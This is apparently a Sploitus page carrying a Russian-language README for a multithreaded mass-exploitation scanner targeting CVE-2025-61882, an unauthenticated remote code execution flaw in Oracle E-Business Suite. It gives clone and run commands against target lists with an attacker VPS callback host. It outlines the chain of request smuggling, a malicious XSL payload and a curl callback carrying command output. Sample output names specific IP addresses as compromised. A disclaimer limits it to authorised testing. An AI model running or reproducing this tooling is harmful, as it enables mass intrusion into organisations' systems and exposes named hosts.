Sploitus

Exploit for CVE-2025-61882

kitploit · 2026-08-27

Exploit Code

MARKDOWN194 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SACHINART-CVE-2025-61882
# Сканер RCE для Oracle E-Business Suite (CVE-2025-61882)

Быстрый многопоточный массовый сканер для обнаружения CVE-2025-61882 в установках Oracle E-Business Suite. Эта критическая уязвимость позволяет неаутентифицированное удалённое выполнение кода.

![Python Version](https://img.shields.io/badge/python-3.7+-blue.svg) ![License](https://img.shields.io/badge/license-MIT-green.svg) ![CVE](https://img.shields.io/badge/CVE-2025--61882-red.svg)

## 🎯 Возможности

  * **Массовое сканирование** — обработка сотен или тысяч целей из файла
  * **Многопоточность** — настраиваемое параллельное сканирование (по умолчанию: 20 потоков)
  * **Автоматическое обнаружение** — проверка RCE путём выполнения команды `id` и анализа вывода
  * **Результаты в реальном времени** — уязвимые цели немедленно записываются в `vuln-output.txt`
  * **Случайные порты** — используются случайные порты (2000-9999) для каждой цели во избежание конфликтов
  * **Чистый вывод** — отслеживание прогресса с минимальным шумом



## 📋 Требования

root@kitploit:~
    
    
    pip install requests
    

И всё. Нужны только Python 3.7+ и библиотека `requests`.

## 🚀 Установка

root@kitploit:~
    
    
    git clone https://github.com/Sachinart/CVE-2025-61882.git
    cd CVE-2025-61882
    pip install -r requirements.txt
    

## 💻 Использование

### Базовое сканирование

root@kitploit:~
    
    
    python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP
    

### Быстрое сканирование (50 потоков)

root@kitploit:~
    
    
    python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 50
    

### Консервативное сканирование (10 потоков)

root@kitploit:~
    
    
    python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 10
    

## 📝 Формат файла целей

Создайте файл `targets.txt` с одним URL в строке:

root@kitploit:~
    
    
    http://oracle-ebs1.example.com:8000
    https://oracle-ebs2.example.com:443
    http://192.168.1.100:8001
    https://apps.company.com
    

## 📊 Пример вывода

root@kitploit:~
    
    
    ╔═══════════════════════════════════════════════════════════════╗
    ║   Oracle E-Business Suite RCE Scanner (CVE-2025-61882)       ║
    ╚═══════════════════════════════════════════════════════════════╝
    
    [*] Loaded 1235 targets from file
    [*] Running with 20 concurrent threads
    [*] Vulnerable hosts will be saved to vuln-output.txt
    
    [*] [1/1235] Checking https://target1.com:443 on port 7893
    [*] [2/1235] Checking https://target2.com:443 on port 5882
    
    [+] Got one! 129.146.56.43 is vulnerable
    [+] Command output: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
    
    =================================================================
    [*] Scan finished in 245.67 seconds
    [*] Found 3 vulnerable target(s)
    [*] Check vuln-output.txt for full results
    =================================================================
    
    [+] Vulnerable targets found:
    
        129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
        192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
        10.0.0.100 → uid=500(oracle) gid=500(oinstall)
    

## 📄 Выходной файл

Результаты сохраняются в `vuln-output.txt`:

root@kitploit:~
    
    
    # Oracle EBS CVE-2025-61882 - Scan Results
    # Started: Tue Oct 07 15:30:45 2025
    # Total targets: 1235
    # Scanner by: Chirag Artani
    
    129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
    192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
    10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)
    

## 🔍 Как это работает

  1. **Получение CSRF-токена** — извлекает действующий CSRF-токен с цели
  2. **HTTP Request Smuggling** — эксплуатирует уязвимость контрабанды запросов для внедрения вредоносной полезной нагрузки
  3. **Доставка XSL-полезной нагрузки** — обслуживает вредоносную XSL-таблицу стилей, которая выполняет команды
  4. **Проверка обратного вызова** — цель выполняет команду `id` и отправляет вывод обратно через curl
  5. **Сопоставление по регулярному выражению** — подтверждает успешный RCE путём проверки шаблона `uid=...gid=...`



## ⚙️ Конфигурация

## 🔒 Ответственное раскрытие

Этот инструмент предназначен **только для авторизованного тестирования безопасности**. Всегда:

  * ✅ Получайте письменное разрешение перед тестированием
  * ✅ Сканируйте только те системы, которыми владеете или на тестирование которых имеете явное разрешение
  * ✅ Ответственно сообщайте о находках затронутым организациям
  * ✅ Следуйте практике скоординированного раскрытия уязвимостей
  * ❌ Никогда не используйте это на неавторизованных системах



**Несанкционированный доступ к компьютерным системам является незаконным.**

## 🐛 Известные проблемы

  * Некоторые цели могут не отвечать из-за блокировки межсетевым экраном/IDS
  * Обнаружение обратного вызова требует, чтобы цель могла связаться с вашим VPS на случайных портах
  * Предупреждения о сертификатах SSL подавляются (ожидаемо для пентестинга)



## 🤝 Вклад в проект

Нашли ошибку? Есть запрос функции?

  1. Сделайте форк репозитория
  2. Создайте свою ветку функции (`git checkout -b feature/amazing-feature`)
  3. Зафиксируйте изменения (`git commit -m 'Add some feature'`)
  4. Отправьте в ветку (`git push origin feature/amazing-feature`)
  5. Откройте Pull Request



## 📜 Лицензия

Этот проект лицензирован по лицензии MIT — подробности см. в файле LICENSE.

## ⚠️ Отказ от ответственности

Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом. Используйте на свой страх и риск.

## 📚 Ссылки

  * Детали CVE-2025-61882
  * Критическое обновление Oracle



* * *

### 👨‍💻 Разработано Chirag Artani

**Веб-сайт** • **Twitter** • **LinkedIn**

Сделано с ❤️ для сообщества infosec